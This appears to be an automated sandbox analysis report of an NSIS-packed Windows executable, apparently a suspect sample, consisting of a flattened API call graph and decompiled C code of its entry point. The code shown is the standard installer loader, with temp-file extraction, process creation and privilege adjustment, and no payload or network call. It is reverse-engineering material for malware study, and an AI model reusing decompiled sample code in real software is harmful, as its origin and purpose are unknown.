403869 3606->3622 3615 403a96 3609->3615 3616 403a67 LookupPrivilegeValueW AdjustTokenPrivileges 3609->3616 3611->3592 3611->3599 3612 40390b 3612->3599 3617 4068d4 5 API calls 3615->3617 3616->3615 3620 403a9d 3617->3620 3618 4038d2 3624 405ede 18 API calls 3618->3624 3619 403913 3623 405ad2 5 API calls 3619->3623 3621 403ab2 ExitWindowsEx 3620->3621 3625 403abf 3620->3625 3621->3610 3621->3625 3622->3618 3622->3619 3626 403918 lstrcatW 3623->3626 3627 4038de 3624->3627 3628 40140b 2 API calls 3625->3628 3629 403934 lstrcatW lstrcmpiW 3626->3629 3630 403929 lstrcatW 3626->3630 3627->3599 3753 406507 lstrcpynW 3627->3753 3628->3610 3629->3612 3631 403954 3629->3631 3630->3629 3633 403960 3631->3633 3634 403959 3631->3634 3638 405ab5 2 API calls 3633->3638 3637 405a38 4 API calls 3634->3637 3635 4038f1 3754 406507 lstrcpynW 3635->3754 3641 40395e 3637->3641 3639 403965 SetCurrentDirectoryW 3638->3639 3642 403982 3639->3642 3643 403977 3639->3643 3696 403bb6 3640->3696 3641->3639 3756 406507 lstrcpynW 3642->3756 3755 406507 lstrcpynW 3643->3755 3646 406544 17 API calls 3647 4039c4 DeleteFileW 3646->3647 3648 4039d0 CopyFileW 3647->3648 3653 40398f 3647->3653 3648->3653 3649 403a1a 3650 4062c7 36 API calls 3649->3650 3650->3612 3651 4062c7 36 API calls 3651->3653 3652 406544 17 API calls 3652->3653 3653->3646 3653->3649 3653->3651 3653->3652 3654 405aea 2 API calls 3653->3654 3655 403a04 CloseHandle 3653->3655 3654->3653 3655->3653 3656->3582 3657->3584 3659 40678e 5 API calls 3658->3659 3660 4034d2 3659->3660 3661 4034dc 3660->3661 3662 405dd6 3 API calls 3660->3662 3661->3590 3663 4034e4 3662->3663 3664 405ab5 2 API calls 3663->3664 3665 4034ea 3664->3665 3761 406026 3665->3761 3765 405ff7 GetFileAttributesW CreateFileW 3668->3765 3670 4030bd 3671 4030cd 3670->3671 3766 406507 lstrcpynW 3670->3766 3671->3598 3673 4030e3 3674 405e22 2 API calls 3673->3674 3675 4030e9 3674->3675 3767 406507 lstrcpynW 3675->3767 3677 4030f4 GetFileSize 3692 4031ee 3677->3692 3695 40310b 3677->3695 3679 4031f7 3679->3671 3681 403227 GlobalAlloc 3679->3681 3804 4034af SetFilePointer 3679->3804 3779 4034af SetFilePointer 3681->3779 3683 40325a 3685 403019 6 API calls 3683->3685 3685->3671 3686 403210 3688 403499 ReadFile 3686->3688 3687 403242 3780 4032b4 3687->3780 3690 40321b 3688->3690 3690->3671 3690->3681 3691 403019 6 API calls 3691->3695 3768 403019 3692->3768 3693 40324e 3693->3671 3693->3693 3694 40328b SetFilePointer 3693->3694 3694->3671 3695->3671 3695->3683 3695->3691 3695->3692 3801 403499 3695->3801 3697 4068d4 5 API calls 3696->3697 3698 403bca 3697->3698 3699 403bd0 GetUserDefaultUILanguage 3698->3699 3700 403be2 3698->3700 3813 40644e wsprintfW 3699->3813 3702 4063d5 3 API calls 3700->3702 3704 403c12 3702->3704 3703 403be0 3814 403e8c 3703->3814 3705 403c31 lstrcatW 3704->3705 3707 4063d5 3 API calls 3704->3707 3705->3703 3707->3705 3709 405ede 18 API calls 3710 403c63 3709->3710 3711 403cf7 3710->3711 3713 4063d5 3 API calls 3710->3713 3712 405ede 18 API calls 3711->3712 3714 403cfd 3712->3714 3715 403c95 3713->3715 3716 403d0d LoadImageW 3714->3716 3717 406544 17 API calls 3714->3717 3715->3711 3721 403cb6 lstrlenW 3715->3721 3725 405e03 CharNextW 3715->3725 3718 403db3 3716->3718 3719 403d34 RegisterClassW 3716->3719 3717->3716 3720 40140b 2 API calls 3718->3720 3722 403dbd 3719->3722 3723 403d6a SystemParametersInfoW CreateWindowExW 3719->3723 3724 403db9 3720->3724 3726 403cc4 lstrcmpiW 3721->3726 3727 403cea 3721->3727 3722->3612 3723->3718 3724->3722 3732 403e8c 18 API calls 3724->3732 3729 403cb3 3725->3729 3726->3727 3730 403cd4 GetFileAttributesW 3726->3730 3728 405dd6 3 API calls 3727->3728 3733 403cf0 3728->3733 3729->3721 3731 403ce0 3730->3731 3731->3727 3734 405e22 2 API calls 3731->3734 3735 403dca 3732->3735 3822 406507 lstrcpynW 3733->3822 3734->3727 3737 403dd6 ShowWindow 3735->3737 3738 403e59 3735->3738 3740 406864 3 API calls 3737->3740 3823 40563c OleInitialize 3738->3823 3742 403dee 3740->3742 3741 403e5f 3743 403e7b 3741->3743 3745 403e63 3741->3745 3744 403dfc GetClassInfoW 3742->3744 3747 406864 3 API calls 3742->3747 3746 40140b 2 API calls 3743->3746 3748 403e10 GetClassInfoW RegisterClassW 3744->3748 3749 403e26 DialogBoxParamW 3744->3749 3745->3722 3750 40140b 2 API calls 3745->3750 3746->3722 3747->3744 3748->3749 3751 40140b 2 API calls 3749->3751 3750->3722 3751->3722 3752->3588 3753->3635 3754->3640 3755->3642 3756->3653 3758 405b7c 3757->3758 3759 403a40 ExitProcess 3758->3759 3760 405b90 MessageBoxIndirectW 3758->3760 3760->3759 3762 406033 GetTickCount GetTempFileNameW 3761->3762 3763 4034f5 3762->3763 3764 406069 3762->3764 3763->3590 3764->3762 3764->3763 3765->3670 3766->3673 3767->3677 3769 403022 3768->3769 3770 40303a 3768->3770 3771 403032 3769->3771 3772 40302b DestroyWindow 3769->3772 3773 403042 3770->3773 3774 40304a GetTickCount 3770->3774 3771->3679 3772->3771 3775 406910 2 API calls 3773->3775 3776 403058 CreateDialogParamW ShowWindow 3774->3776 3777 40307b 3774->3777 3778 403048 3775->3778 3776->3777 3777->3679 3778->3679 3779->3687 3781 4032cd 3780->3781 3782 4032f8 3781->3782 3812 4034af SetFilePointer 3781->3812 3784 403499 ReadFile 3782->3784 3785 403303 3784->3785 3786 403315 GetTickCount 3785->3786 3787 403439 3785->3787 3789 403423 3785->3789 3797 403328 3786->3797 3788 40343d 3787->3788 3793 403455 3787->3793 3790 403499 ReadFile 3788->3790 3789->3693 3790->3789 3791 403499 ReadFile 3791->3793 3792 403499 ReadFile 3792->3797 3793->3789 3793->3791 3794 4060a9 WriteFile 3793->3794 3794->3793 3796 40338e GetTickCount 3796->3797 3797->3789 3797->3792 3797->3796 3798 4033b7 MulDiv wsprintfW 3797->3798 3800 4060a9 WriteFile 3797->3800 3805 406a4f 3797->3805 3799 405569 24 API calls 3798->3799 3799->3797 3800->3797 3802 40607a ReadFile 3801->3802 3803 4034ac 3802->3803 3803->3695 3804->3686 3806 406a74 3805->3806 3809 406a7c 3805->3809 3806->3797 3807 406b03 GlobalFree 3808 406b0c GlobalAlloc 3807->3808 3808->3806 3808->3809 3809->3806 3809->3807 3809->3808 3810 406b83 GlobalAlloc 3809->3810 3811 406b7a GlobalFree 3809->3811 3810->3806 3810->3809 3811->3810 3812->3782 3813->3703 3815 403ea0 3814->3815 3830 40644e wsprintfW 3815->3830 3817 403f11 3818 403f45 18 API calls 3817->3818 3820 403f16 3818->3820 3819 403c41 3819->3709 3820->3819 3821 406544 17 API calls 3820->3821 3821->3820 3822->3711 3824 4044af SendMessageW 3823->3824 3825 40565f 3824->3825 3828 401389 2 API calls 3825->3828 3829 405686 3825->3829 3826 4044af SendMessageW 3827 405698 OleUninitialize 3826->3827 3827->3741 3828->3825 3829->3826 3830->3817 4322 401b77 4323 402da6 17 API calls 4322->4323 4324 401b7e 4323->4324 4325 402d84 17 API calls 4324->4325 4326 401b87 wsprintfW 4325->4326 4327 402c2a 4326->4327 4328 40167b 4329 402da6 17 API calls 4328->4329 4330 401682 4329->4330 4331 402da6 17 API calls 4330->4331 4332 40168b 4331->4332 4333 402da6 17 API calls 4332->4333 4334 401694 MoveFileW 4333->4334 4335 4016a7 4334->4335 4341 4016a0 4334->4341 4336 4022f6 4335->4336 4337 40683d 2 API calls 4335->4337 4339 4016b6 4337->4339 4338 401423 24 API calls 4338->4336 4339->4336 4340 4062c7 36 API calls 4339->4340 4340->4341 4341->4338 4342 406bfe 4343 406a82 4342->4343 4344 4073ed 4343->4344 4345 406b03 GlobalFree 4343->4345 4346 406b0c GlobalAlloc 4343->4346 4347 406b83 GlobalAlloc 4343->4347 4348 406b7a GlobalFree 4343->4348 4345->4346 4346->4343 4346->4344 4347->4343 4347->4344 4348->4347 4349 4019ff 4350 402da6 17 API calls 4349->4350 4351 401a06 4350->4351 4352 402da6 17 API calls 4351->4352 4353 401a0f 4352->4353 4354 401a16 lstrcmpiW 4353->4354 4355 401a28 lstrcmpW 4353->4355 4356 401a1c 4354->4356 4355->4356 4357 4022ff 4358 402da6 17 API calls 4357->4358 4359 402305 4358->4359 4360 402da6 17 API calls 4359->4360 4361 40230e 4360->4361 4362 402da6 17 API calls 4361->4362 4363 402317 4362->4363 4364 40683d 2 API calls 4363->4364 4365 402320 4364->4365 4366 402331 lstrlenW lstrlenW 4365->4366 4370 402324 4365->4370 4368 405569 24 API calls 4366->4368 4367 405569 24 API calls 4371 40232c 4367->4371 4369 40236f SHFileOperationW 4368->4369 4369->4370 4369->4371 4370->4367 4370->4371 4372 401000 4373 401037 BeginPaint GetClientRect 4372->4373 4374 40100c DefWindowProcW 4372->4374 4376 4010f3 4373->4376 4377 401179 4374->4377 4378 401073 CreateBrushIndirect FillRect DeleteObject 4376->4378 4379 4010fc 4376->4379 4378->4376 4380 401102 CreateFontIndirectW 4379->4380 4381 401167 EndPaint 4379->4381 4380->4381 4382 401112 6 API calls 4380->4382 4381->4377 4382->4381 4383 401d81 4384 401d94 GetDlgItem 4383->4384 4385 401d87 4383->4385 4386 401d8e 4384->4386 4387 402d84 17 API calls 4385->4387 4388 401dd5 GetClientRect LoadImageW SendMessageW 4386->4388 4389 402da6 17 API calls 4386->4389 4387->4386 4391 401e33 4388->4391 4393 401e3f 4388->4393 4389->4388 4392 401e38 DeleteObject 4391->4392 4391->4393 4392->4393 4394 401503 4395 40150b 4394->4395 4397 40151e 4394->4397 4396 402d84 17 API calls 4395->4396 4396->4397 4398 402383 4399 40238a 4398->4399 4403 40239d 4398->4403 4400 406544 17 API calls 4399->4400 4401 402397 4400->4401 4402 405b67 MessageBoxIndirectW 4401->4402 4402->4403 4404 402c05 SendMessageW 4405 402c2a 4404->4405 4406 402c1f InvalidateRect 4404->4406 4406->4405 4414 40248a 4415 402da6 17 API calls 4414->4415 4416 40249c 4415->4416 4417 402da6 17 API calls 4416->4417 4418 4024a6 4417->4418 4431 402e36 4418->4431 4421 4024de 4424 4024ea 4421->4424 4426 402d84 17 API calls 4421->4426 4422 40292e 4423 402da6 17 API calls 4425 4024d4 lstrlenW 4423->4425 4427 402509 RegSetValueExW 4424->4427 4428 4032b4 35 API calls 4424->4428 4425->4421 4426->4424 4429 40251f RegCloseKey 4427->4429 4428->4427 4429->4422 4432 402e51 4431->4432 4435 4063a2 4432->4435 4436 4063b1 4435->4436 4437 4024b6 4436->4437 4438 4063bc RegCreateKeyExW 4436->4438 4437->4421 4437->4422 4437->4423 4438->4437 4439 40290b 4440 402da6 17 API calls 4439->4440 4441 402912 FindFirstFileW 4440->4441 4442 40293a 4441->4442 4445 402925 4441->4445 4447 40644e wsprintfW 4442->4447 4444 402943 4448 406507 lstrcpynW 4444->4448 4447->4444 4448->4445 4449 40190c 4450 401943 4449->4450 4451 402da6 17 API calls 4450->4451 4452 401948 4451->4452 4453 405c13 67 API calls 4452->4453 4454 401951 4453->4454 4455 40490d 4456 404943 4455->4456 4457 40491d 4455->4457 4459 4044ca 8 API calls 4456->4459 4458 404463 18 API calls 4457->4458 4460 40492a SetDlgItemTextW 4458->4460 4461 40494f 4459->4461 4460->4456 4462 40190f 4463 402da6 17 API calls 4462->4463 4464 401916 4463->4464 4465 405b67 MessageBoxIndirectW 4464->4465 4466 40191f 4465->4466 4467 401491 4468 405569 24 API calls 4467->4468 4469 401498 4468->4469 4470 402891 4471 402898 4470->4471 4474 402ba9 4470->4474 4472 402d84 17 API calls 4471->4472 4473 40289f 4472->4473 4475 4028ae SetFilePointer 4473->4475 4475->4474 4476 4028be 4475->4476 4478 40644e wsprintfW 4476->4478 4478->4474 4479 401f12 4480 402da6 17 API calls 4479->4480 4481 401f18 4480->4481 4482 402da6 17 API calls 4481->4482 4483 401f21 4482->4483 4484 402da6 17 API calls 4483->4484 4485 401f2a 4484->4485 4486 402da6 17 API calls 4485->4486 4487 401f33 4486->4487 4488 401423 24 API calls 4487->4488 4489 401f3a 4488->4489 4496 405b2d ShellExecuteExW 4489->4496 4491 401f82 4492 40292e 4491->4492 4493 40697f 5 API calls 4491->4493 4494 401f9f CloseHandle 4493->4494 4494->4492 4496->4491 4497 402f93 4498 402fa5 SetTimer 4497->4498 4499 402fbe 4497->4499 4498->4499 4500 403013 4499->4500 4501 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4499->4501 4501->4500 4502 401d17 4503 402d84 17 API calls 4502->4503 4504 401d1d IsWindow 4503->4504 4505 401a20 4504->4505 4506 404599 lstrcpynW lstrlenW 4507 401b9b 4508 401ba8 4507->4508 4509 401bec 4507->4509 4510 401c31 4508->4510 4515 401bbf 4508->4515 4511 401bf1 4509->4511 4512 401c16 GlobalAlloc 4509->4512 4513 406544 17 API calls 4510->4513 4519 40239d 4510->4519 4511->4519 4528 406507 lstrcpynW 4511->4528 4514 406544 17 API calls 4512->4514 4517 402397 4513->4517 4514->4510 4526 406507 lstrcpynW 4515->4526 4522 405b67 MessageBoxIndirectW 4517->4522 4520 401c03 GlobalFree 4520->4519 4521 401bce 4527 406507 lstrcpynW 4521->4527 4522->4519 4524 401bdd 4529 406507 lstrcpynW 4524->4529 4526->4521 4527->4524 4528->4520 4529->4519 4530 40261c 4531 402da6 17 API calls 4530->4531 4532 402623 4531->4532 4535 405ff7 GetFileAttributesW CreateFileW 4532->4535 4534 40262f 4535->4534 4543 40149e 4544 4014ac PostQuitMessage 4543->4544 4545 40239d 4543->4545 4544->4545 4546 40259e 4556 402de6 4546->4556 4549 402d84 17 API calls 4550 4025b1 4549->4550 4551 40292e 4550->4551 4552 4025d9 RegEnumValueW 4550->4552 4553 4025cd RegEnumKeyW 4550->4553 4554 4025ee RegCloseKey 4552->4554 4553->4554 4554->4551 4557 402da6 17 API calls 4556->4557 4558 402dfd 4557->4558 4559 406374 RegOpenKeyExW 4558->4559 4560 4025a8 4559->4560 4560->4549 4561 404622 4562 40463a 4561->4562 4569 404754 4561->4569 4566 404463 18 API calls 4562->4566 4563 4047be 4564 404888 4563->4564 4565 4047c8 GetDlgItem 4563->4565 4572 4044ca 8 API calls 4564->4572 4567 4047e2 4565->4567 4568 404849 4565->4568 4571 4046a1 4566->4571 4567->4568 4576 404808 SendMessageW LoadCursorW SetCursor 4567->4576 4568->4564 4577 40485b 4568->4577 4569->4563 4569->4564 4570 40478f GetDlgItem SendMessageW 4569->4570 4594 404485 EnableWindow 4570->4594 4574 404463 18 API calls 4571->4574 4575 404883 4572->4575 4579 4046ae CheckDlgButton 4574->4579 4595 4048d1 4576->4595 4581 404871 4577->4581 4582 404861 SendMessageW 4577->4582 4578 4047b9 4584 4048ad SendMessageW 4578->4584 4592 404485 EnableWindow 4579->4592 4581->4575 4583 404877 SendMessageW 4581->4583 4582->4581 4583->4575 4584->4563 4587 4046cc GetDlgItem 4593 404498 SendMessageW 4587->4593 4589 4046e2 SendMessageW 4590 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4589->4590 4591 4046ff GetSysColor 4589->4591 4590->4575 4591->4590 4592->4587 4593->4589 4594->4578 4598 405b2d ShellExecuteExW 4595->4598 4597 404837 LoadCursorW SetCursor 4597->4568 4598->4597 4599 4015a3 4600 402da6 17 API calls 4599->4600 4601 4015aa SetFileAttributesW 4600->4601 4602 4015bc 4601->4602 3538 401fa4 3539 402da6 17 API calls 3538->3539 3540 401faa 3539->3540 3541 405569 24 API calls 3540->3541 3542 401fb4 3541->3542 3553 405aea CreateProcessW 3542->3553 3545 401fdd CloseHandle 3548 40292e 3545->3548 3549 401fcf 3550 401fd4 3549->3550 3551 401fdf 3549->3551 3561 40644e wsprintfW 3550->3561 3551->3545 3554 401fba 3553->3554 3555 405b1d CloseHandle 3553->3555 3554->3545 3554->3548 3556 40697f WaitForSingleObject 3554->3556 3555->3554 3557 406999 3556->3557 3558 4069ab GetExitCodeProcess 3557->3558 3562 406910 3557->3562 3558->3549 3561->3545 3563 40692d PeekMessageW 3562->3563 3564 406923 DispatchMessageW 3563->3564 3565 40693d WaitForSingleObject 3563->3565 3564->3563 3565->3557 4603 4056a8 4604 405852 4603->4604 4605 4056c9 GetDlgItem GetDlgItem GetDlgItem 4603->4605 4606 405883 4604->4606 4607 40585b GetDlgItem CreateThread CloseHandle 4604->4607 4648 404498 SendMessageW 4605->4648 4610 4058ae 4606->4610 4611 4058d3 4606->4611 4612 40589a ShowWindow ShowWindow 4606->4612 4607->4606 4609 405739 4614 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4609->4614 4613 40590e 4610->4613 4616 4058c2 4610->4616 4617 4058e8 ShowWindow 4610->4617 4618 4044ca 8 API calls 4611->4618 4650 404498 SendMessageW 4612->4650 4613->4611 4621 40591c SendMessageW 4613->4621 4619 405792 SendMessageW SendMessageW 4614->4619 4620 4057ae 4614->4620 4622 40443c SendMessageW 4616->4622 4624 405908 4617->4624 4625 4058fa 4617->4625 4623 4058e1 4618->4623 4619->4620 4627 4057c1 4620->4627 4628 4057b3 SendMessageW 4620->4628 4621->4623 4629 405935 CreatePopupMenu 4621->4629 4622->4611 4626 40443c SendMessageW 4624->4626 4630 405569 24 API calls 4625->4630 4626->4613 4632 404463 18 API calls 4627->4632 4628->4627 4631 406544 17 API calls 4629->4631 4630->4624 4633 405945 AppendMenuW 4631->4633 4634 4057d1 4632->4634 4635 405962 GetWindowRect 4633->4635 4636 405975 TrackPopupMenu 4633->4636 4637 4057da ShowWindow 4634->4637 4638 40580e GetDlgItem SendMessageW 4634->4638 4635->4636 4636->4623 4639 405990 4636->4639 4640 4057f0 ShowWindow 4637->4640 4641 4057fd 4637->4641 4638->4623 4642 405835 SendMessageW SendMessageW 4638->4642 4643 4059ac SendMessageW 4639->4643 4640->4641 4649 404498 SendMessageW 4641->4649 4642->4623 4643->4643 4644 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4643->4644 4646 4059ee SendMessageW 4644->4646 4646->4646 4647 405a17 GlobalUnlock SetClipboardData CloseClipboard 4646->4647 4647->4623 4648->4609 4649->4638 4650->4610 4651 40202a 4652 402da6 17 API calls 4651->4652 4653 402031 4652->4653 4654 4068d4 5 API calls 4653->4654 4655 402040 4654->4655 4656 4020cc 4655->4656 4657 40205c GlobalAlloc 4655->4657 4657->4656 4658 402070 4657->4658 4659 4068d4 5 API calls 4658->4659 4660 402077 4659->4660 4661 4068d4 5 API calls 4660->4661 4662 402081 4661->4662 4662->4656 4666 40644e wsprintfW 4662->4666 4664 4020ba 4667 40644e wsprintfW 4664->4667 4666->4664 4667->4656 4668 40252a 4669 402de6 17 API calls 4668->4669 4670 402534 4669->4670 4671 402da6 17 API calls 4670->4671 4672 40253d 4671->4672 4673 402548 RegQueryValueExW 4672->4673 4675 40292e 4672->4675 4674 402568 4673->4674 4676 40256e RegCloseKey 4673->4676 4674->4676 4679 40644e wsprintfW 4674->4679 4676->4675 4679->4676 4680 404caa 4681 404cd6 4680->4681 4682 404cba 4680->4682 4684 404d09 4681->4684 4685 404cdc SHGetPathFromIDListW 4681->4685 4691 405b4b GetDlgItemTextW 4682->4691 4687 404cf3 SendMessageW 4685->4687 4688 404cec 4685->4688 4686 404cc7 SendMessageW 4686->4681 4687->4684 4689 40140b 2 API calls 4688->4689 4689->4687 4691->4686 4692 4021aa 4693 402da6 17 API calls 4692->4693 4694 4021b1 4693->4694 4695 402da6 17 API calls 4694->4695 4696 4021bb 4695->4696 4697 402da6 17 API calls 4696->4697 4698 4021c5 4697->4698 4699 402da6 17 API calls 4698->4699 4700 4021cf 4699->4700 4701 402da6 17 API calls 4700->4701 4702 4021d9 4701->4702 4703 402218 CoCreateInstance 4702->4703 4704 402da6 17 API calls 4702->4704 4707 402237 4703->4707 4704->4703 4705 401423 24 API calls 4706 4022f6 4705->4706 4707->4705 4707->4706 4708 401a30 4709 402da6 17 API calls 4708->4709 4710 401a39 ExpandEnvironmentStringsW 4709->4710 4711 401a4d 4710->4711 4713 401a60 4710->4713 4712 401a52 lstrcmpW 4711->4712 4711->4713 4712->4713 4719 4023b2 4720 4023c0 4719->4720 4721 4023ba 4719->4721 4723 4023ce 4720->4723 4724 402da6 17 API calls 4720->4724 4722 402da6 17 API calls 4721->4722 4722->4720 4725 4023dc 4723->4725 4726 402da6 17 API calls 4723->4726 4724->4723 4727 402da6 17 API calls 4725->4727 4726->4725 4728 4023e5 WritePrivateProfileStringW 4727->4728 4736 402434 4737 402467 4736->4737 4738 40243c 4736->4738 4739 402da6 17 API calls 4737->4739 4740 402de6 17 API calls 4738->4740 4741 40246e 4739->4741 4742 402443 4740->4742 4747 402e64 4741->4747 4744 402da6 17 API calls 4742->4744 4746 40247b 4742->4746 4745 402454 RegDeleteValueW RegCloseKey 4744->4745 4745->4746 4748 402e78 4747->4748 4750 402e71 4747->4750 4748->4750 4751 402ea9 4748->4751 4750->4746 4752 406374 RegOpenKeyExW 4751->4752 4753 402ed7 4752->4753 4754 402ee7 RegEnumValueW 4753->4754 4761 402f81 4753->4761 4763 402f0a 4753->4763 4755 402f71 RegCloseKey 4754->4755 4754->4763 4755->4761 4756 402f46 RegEnumKeyW 4757 402f4f RegCloseKey 4756->4757 4756->4763 4758 4068d4 5 API calls 4757->4758 4759 402f5f 4758->4759 4759->4761 4762 402f63 RegDeleteKeyW 4759->4762 4760 402ea9 6 API calls 4760->4763 4761->4750 4762->4761 4763->4755 4763->4756 4763->4757 4763->4760 4771 401735 4772 402da6 17 API calls 4771->4772 4773 40173c SearchPathW 4772->4773 4774 401757 4773->4774 4775 401d38 4776 402d84 17 API calls 4775->4776 4777 401d3f 4776->4777 4778 402d84 17 API calls 4777->4778 4779 401d4b GetDlgItem 4778->4779 4780 402638 4779->4780 4781 4014b8 4782 4014be 4781->4782 4783 401389 2 API calls 4782->4783 4784 4014c6 4783->4784 4792 40263e 4793 402652 4792->4793 4794 40266d 4792->4794 4797 402d84 17 API calls 4793->4797 4795 402672 4794->4795 4796 40269d 4794->4796 4798 402da6 17 API calls 4795->4798 4799 402da6 17 API calls 4796->4799 4804 402659 4797->4804 4800 402679 4798->4800 4801 4026a4 lstrlenW 4799->4801 4809 406529 WideCharToMultiByte 4800->4809 4801->4804 4803 40268d lstrlenA 4803->4804 4805 4026e7 4804->4805 4806 4026d1 4804->4806 4808 4060d8 5 API calls 4804->4808 4806->4805 4807 4060a9 WriteFile 4806->4807 4807->4805 4808->4806 4809->4803

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 4034f7-403547 SetErrorMode GetVersionExW 1 403581-403588 0->1 2 403549-40357d GetVersionExW 0->2 3 403592-4035d2 1->3 4 40358a 1->4 2->1 5 4035d4-4035dc call 4068d4 3->5 6 4035e5 3->6 4->3 5->6 11 4035de 5->11 7 4035ea-4035fe call 406864 lstrlenA 6->7 13 403600-40361c call 4068d4 * 3 7->13 11->6 20 40362d-40368f #17 OleInitialize SHGetFileInfoW call 406507 GetCommandLineW call 406507 13->20 21 40361e-403624 13->21 28 403691-403693 20->28 29 403698-4036ab call 405e03 CharNextW 20->29 21->20 25 403626 21->25 25->20 28->29 32 4037a2-4037a8 29->32 33 4036b0-4036b6 32->33 34 4037ae 32->34 36 4036b8-4036bd 33->36 37 4036bf-4036c5 33->37 35 4037c2-4037dc GetTempPathW call 4034c6 34->35 46 403834-40384c DeleteFileW call 40307d 35->46 47 4037de-4037fc GetWindowsDirectoryW lstrcatW call 4034c6 35->47 36->36 36->37 39 4036c7-4036cb 37->39 40 4036cc-4036d0 37->40 39->40 41 403790-40379e call 405e03 40->41 42 4036d6-4036dc 40->42 41->32 61 4037a0-4037a1 41->61 44 4036f6-40372f 42->44 45 4036de-4036e5 42->45 51 403731-403736 44->51 52 40374b-403785 44->52 49 4036e7-4036ea 45->49 50 4036ec 45->50 62 403852-403858 46->62 63 403a23-403a31 ExitProcess OleUninitialize 46->63 47->46 66 4037fe-40382e GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034c6 47->66 49->44 49->50 50->44 51->52 56 403738-403740 51->56 58 403787-40378b 52->58 59 40378d-40378f 52->59 64 403742-403745 56->64 65 403747 56->65 58->59 67 4037b0-4037bd call 406507 58->67 59->41 61->32 68 40385e-403871 call 405e03 62->68 69 4038ff-403906 call 403bb6 62->69 71 403a33-403a42 call 405b67 ExitProcess 63->71 72 403a48-403a4e 63->72 64->52 64->65 65->52 66->46 66->63 67->35 87 4038c3-4038d0 68->87 88 403873-4038a8 68->88 81 40390b-40390e 69->81 77 403a50-403a65 GetCurrentProcess OpenProcessToken 72->77 78 403ac6-403ace 72->78 85 403a96-403aa4 call 4068d4 77->85 86 403a67-403a90 LookupPrivilegeValueW AdjustTokenPrivileges 77->86 82 403ad0 78->82 83 403ad3-403ad6 ExitProcess 78->83 81->63 82->83 94 403ab2-403abd ExitWindowsEx 85->94 95 403aa6-403ab0 85->95 86->85 91 4038d2-4038e0 call 405ede 87->91 92 403913-403927 call 405ad2 lstrcatW 87->92 90 4038aa-4038ae 88->90 96 4038b0-4038b5 90->96 97 4038b7-4038bf 90->97 91->63 108 4038e6-4038fc call 406507 * 2 91->108 106 403934-40394e lstrcatW lstrcmpiW 92->106 107 403929-40392f lstrcatW 92->107 94->78 100 403abf-403ac1 call 40140b 94->100 95->94 95->100 96->97 101 4038c1 96->101 97->90 97->101 100->78 101->87 109 403a21 106->109 110 403954-403957 106->110 107->106 108->69 109->63 112 403960 call 405ab5 110->112 113 403959-40395e call 405a38 110->113 118 403965-403975 SetCurrentDirectoryW 112->118 113->118 121 403982-4039ae call 406507 118->121 122 403977-40397d call 406507 118->122 126 4039b3-4039ce call 406544 DeleteFileW 121->126 122->121 129 4039d0-4039e0 CopyFileW 126->129 130 403a0e-403a18 126->130 129->130 132 4039e2-403a02 call 4062c7 call 406544 call 405aea 129->132 130->126 131 403a1a-403a1c call 4062c7 130->131 131->109 132->130 140 403a04-403a0b CloseHandle 132->140 140->130
                          C-Code - Quality: 78%
                          			_entry_() {
                          				WCHAR* _v8;
                          				signed int _v12;
                          				void* _v16;
                          				signed int _v20;
                          				int _v24;
                          				int _v28;
                          				struct _TOKEN_PRIVILEGES _v40;
                          				signed char _v42;
                          				int _v44;
                          				signed int _v48;
                          				intOrPtr _v278;
                          				signed short _v310;
                          				struct _OSVERSIONINFOW _v324;
                          				struct _SHFILEINFOW _v1016;
                          				intOrPtr* _t88;
                          				WCHAR* _t92;
                          				char* _t94;
                          				void _t97;
                          				void* _t116;
                          				WCHAR* _t118;
                          				signed int _t119;
                          				intOrPtr* _t123;
                          				void* _t137;
                          				void* _t143;
                          				void* _t148;
                          				void* _t152;
                          				void* _t157;
                          				signed int _t167;
                          				void* _t170;
                          				void* _t175;
                          				intOrPtr _t177;
                          				intOrPtr _t178;
                          				intOrPtr* _t179;
                          				int _t188;
                          				void* _t189;
                          				void* _t198;
                          				signed int _t204;
                          				signed int _t209;
                          				signed int _t214;
                          				signed int _t216;
                          				int* _t218;
                          				signed int _t226;
                          				signed int _t229;
                          				CHAR* _t231;
                          				char* _t232;
                          				signed int _t233;
                          				WCHAR* _t234;
                          				void* _t250;
                          
                          				_t216 = 0x20;
                          				_t188 = 0;
                          				_v24 = 0;
                          				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                          				_v20 = 0;
                          				SetErrorMode(0x8001); // executed
                          				_v324.szCSDVersion = 0;
                          				_v48 = 0;
                          				_v44 = 0;
                          				_v324.dwOSVersionInfoSize = 0x11c;
                          				if(GetVersionExW( &_v324) == 0) {
                          					_v324.dwOSVersionInfoSize = 0x114;
                          					GetVersionExW( &_v324);
                          					asm("sbb eax, eax");
                          					_v42 = 4;
                          					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                          				}
                          				if(_v324.dwMajorVersion < 0xa) {
                          					_v310 = _v310 & 0x00000000;
                          				}
                          				 *0x42a2d8 = _v324.dwBuildNumber;
                          				 *0x42a2dc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                          				if( *0x42a2de != 0x600) {
                          					_t179 = E004068D4(_t188);
                          					if(_t179 != _t188) {
                          						 *_t179(0xc00);
                          					}
                          				}
                          				_t231 = "UXTHEME";
                          				do {
                          					E00406864(_t231); // executed
                          					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                          				} while ( *_t231 != 0);
                          				E004068D4(0xb);
                          				 *0x42a224 = E004068D4(9);
                          				_t88 = E004068D4(7);
                          				if(_t88 != _t188) {
                          					_t88 =  *_t88(0x1e);
                          					if(_t88 != 0) {
                          						 *0x42a2dc =  *0x42a2dc | 0x00000080;
                          					}
                          				}
                          				__imp__#17();
                          				__imp__OleInitialize(_t188); // executed
                          				 *0x42a2e0 = _t88;
                          				SHGetFileInfoW(0x4216c8, _t188,  &_v1016, 0x2b4, _t188); // executed
                          				E00406507(0x429220, L"NSIS Error");
                          				_t92 = GetCommandLineW();
                          				_t232 = L"\"C:\\Users\\jones\\Desktop\\dhGoVvfmul.exe\" ";
                          				E00406507(_t232, _t92);
                          				_t94 = _t232;
                          				_t233 = 0x22;
                          				 *0x42a220 = 0x400000;
